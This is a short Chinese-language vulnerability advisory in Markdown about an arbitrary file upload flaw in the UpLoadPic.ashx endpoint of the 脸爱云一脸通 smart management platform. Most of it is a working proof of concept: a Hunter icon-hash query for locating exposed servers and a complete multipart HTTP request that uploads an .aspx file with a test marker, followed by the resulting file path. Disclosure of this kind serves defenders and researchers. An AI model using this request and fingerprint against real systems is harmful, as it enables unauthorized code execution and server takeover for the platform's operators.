脸爱云一脸通智慧管理平台UpLoadPic存在任意文件上传漏洞.md

脸爱云一脸通智慧管理平台UpLoadPic存在任意文件上传漏洞

一、漏洞简介

脸爱云一脸通智慧管理平台是一套功能强大，运行稳定，操作简单方便，用户界面美观，轻松统计数据的一脸通系统。无需安装，只需在后台配置即可在浏览器登录。脸爱云一脸通智慧管理平台UpLoadPic存在任意文件上传漏洞。攻击者可通过该漏洞获取服务器权限。

二、影响版本

• 脸爱云一脸通智慧管理平台

三、资产测绘

• hunterweb.icon=="4f0be080512ee0b45fc90ff894b6ba60"
• 特征

四、漏洞复现

POST /UpLoadPic.ashx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Content-Length: 431
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywt7cEu1eBdibB13u
X-Requested-With: XMLHttpRequest

------WebKitFormBoundarywt7cEu1eBdibB13u
Content-Disposition: form-data; name="action"

post
------WebKitFormBoundarywt7cEu1eBdibB13u
Content-Disposition: form-data; name="myPhoto"; filename="1.aspx"
Content-Type: image/png

<% response.write("FC5E038D38A57032085441E7FE7010B0") %>
------WebKitFormBoundarywt7cEu1eBdibB13u
Content-Disposition: form-data; name="oldName"


------WebKitFormBoundarywt7cEu1eBdibB13u--

文件上传位置

/images/48884063e99e45ba9fc0fa7e138261021.aspx

更新: 2024-04-28 15:34:50
原文: https://www.yuque.com/xiaokp7/ocvun2/pq3pt0qifwh7x5wo